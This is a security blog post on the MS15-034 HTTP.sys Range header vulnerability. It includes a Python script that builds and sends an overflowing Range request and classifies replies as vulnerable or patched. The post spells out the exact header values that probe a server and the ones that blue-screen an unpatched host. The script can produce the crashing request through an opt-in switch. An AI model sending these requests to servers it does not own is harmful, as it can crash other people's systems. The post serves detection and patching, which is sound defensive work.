This entry is chiefly intended as a collection of links to further information on MS15-034 (CVE-2015-1635), which was announced this Tuesday. The vulnerability is in HTTP.sys, the Microsoft Windows kernel-mode component that lets various packages listen for HTTP requests – the obvious one being IIS, although many other software packages (anything built on the HTTP Server API) use the same vulnerable component.
HTTP.sys acts as a kernel accelerator for web servers: it parses incoming requests and can serve cached responses without handing them off to user mode. The bug is in its handling of the HTTP Range header, the feature that allows a byte range of an object to be fetched; a specially large range value overflows the arithmetic used to check it. The exploit for the vulnerability comes in three different guises :-
- An informational probe. If an “attacker” requests a range starting with 0 and ending with the largest 64-bit value (Range: bytes=0-18446744073709551615), the response indicates whether the server is vulnerable or not: an unpatched server answers with 416 Requested Range Not Satisfiable, whereas a patched one rejects the header with 400 and the text “The request has an invalid header name”.
- A denial of service attack. If the attacker requests a range starting with 20 (or higher) and the same huge upper bound, the server is blue-screened (i.e. the whole host crashes, not just the web server process, because the fault happens in kernel mode).
- A remote code execution attack. If the attacker requests a suitably crafted range, then the attacker may in theory be able to execute their own code on the server. Essentially they take over ownership of the server. No working exploit for this variant has been published so far.
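The probe and its interpretation, as an added example rather than code from the original post or from the tools it links to. It builds the raw request with the overflowing Range header, refuses to build the crashing variant unless explicitly asked, and classifies a reply using the documented behaviour (416 from an unpatched HTTP.sys, 400 “invalid header name” from a patched one). The two sample replies, the host and path names, and the `allow_dos` switch are constructed for the example.

```python
"""MS15-034 informational probe: build the request and classify the reply.

Added example (not the blog's or Microsoft's code). The sample replies
below are constructed to match the documented behaviour; they are not
captured traffic.
"""
import socket

# 2**64 - 1 = 18446744073709551615, the upper bound that overflows the range check.
RANGE_UPPER = 2**64 - 1

# Constructed sample replies (not captured traffic).
VULNERABLE_REPLY = (
    b"HTTP/1.1 416 Requested Range Not Satisfiable\r\n"
    b"Content-Type: text/html\r\n"
    b"Server: Microsoft-IIS/7.5\r\n"
    b"Content-Range: bytes */52\r\n"
    b"\r\n"
)
PATCHED_REPLY = (
    b"HTTP/1.1 400 Bad Request\r\n"
    b"Content-Type: text/html; charset=us-ascii\r\n"
    b"Server: Microsoft-HTTPAPI/2.0\r\n"
    b"\r\n"
    b"<h1>Bad Request</h1><p>The request has an invalid header name</p>"
)


def build_probe(host, path="/", start=0, allow_dos=False):
    """Return the raw HTTP/1.1 GET carrying the malformed Range header.

    start=0 is the informational probe.  Start values of 20 and above
    blue-screen an unpatched host, so they are refused unless the caller
    sets allow_dos=True (a hypothetical safety switch for lab use only).
    """
    if start < 0:
        raise ValueError("start must be non-negative")
    if start >= 20 and not allow_dos:
        raise ValueError("start >= 20 crashes a vulnerable host; pass allow_dos=True only against a lab box")
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Range: bytes={start}-{RANGE_UPPER}\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode("ascii")


def classify(reply):
    """Map a raw HTTP reply to 'vulnerable', 'patched' or 'unknown'.

    'unknown' covers non-IIS servers, dynamic content and anything else
    that does not exercise the kernel-mode range handling; it is
    inconclusive, not a clean bill of health.
    """
    head, _sep, body = reply.partition(b"\r\n\r\n")
    status_line = head.split(b"\r\n", 1)[0]
    parts = status_line.split(b" ", 2)
    if len(parts) < 2 or not parts[1].isdigit():
        return "unknown"
    code = int(parts[1])
    if code == 416:
        return "vulnerable"
    if code == 400 and b"invalid header name" in body.lower():
        return "patched"
    return "unknown"


def send_probe(host, port=80, path="/", timeout=5.0):
    """Send the start=0 probe over a plain socket and return the raw reply."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_probe(host, path))
        chunks = []
        while True:
            try:
                data = sock.recv(4096)
            except socket.timeout:
                break
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


if __name__ == "__main__":
    import sys

    if len(sys.argv) > 1:
        target = sys.argv[1]
        print(target, "->", classify(send_probe(target)))
    else:
        for name, sample in (("vulnerable", VULNERABLE_REPLY), ("patched", PATCHED_REPLY)):
            print(name, "->", classify(sample))
```

Run it with a hostname to probe a box you own; with no argument it only classifies the two constructed replies. Point the probe at a static resource (an image or a plain .htm file) rather than an application page: the 416 only appears when HTTP.sys itself handles the range, and anything else comes back as “unknown”, which must not be read as “patched”.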
In terms of what we have actually seen, attack traffic has been limited to sources that are apparently just scanning for vulnerable systems. But we have seen it.
There are plenty of media reports panicking over it right now, but whilst it is a serious vulnerability, it is not as serious as it first seems. The remote code execution vulnerability is theoretical at the moment, and there is a really rather simple work-around for those who cannot patch: Microsoft’s bulletin lists disabling IIS kernel caching, which stops HTTP.sys from serving the cached static content that the malformed range request exercises. Note that this costs some performance and only covers IIS; other software listening through HTTP.sys still needs the patch.
Links :-
- https://isc.sans.edu/forums/diary/Microsoft+Patch+Tuesday+April+2015/19577/
- https://isc.sans.edu/forums/diary/MS15034+HTTPsys+IIS+DoS+And+Possible+Remote+Code+Execution+PATCH+NOW/19583/ (SANS upgrades status to “PATCH NOW”).
- http://blog.didierstevens.com/2015/04/17/ms15-034-detection-some-observations/
- http://www.theregister.co.uk/2015/04/16/http_sys_exploit_wild_ms15_034/
- https://github.com/rapid7/metasploit-framework/pull/5150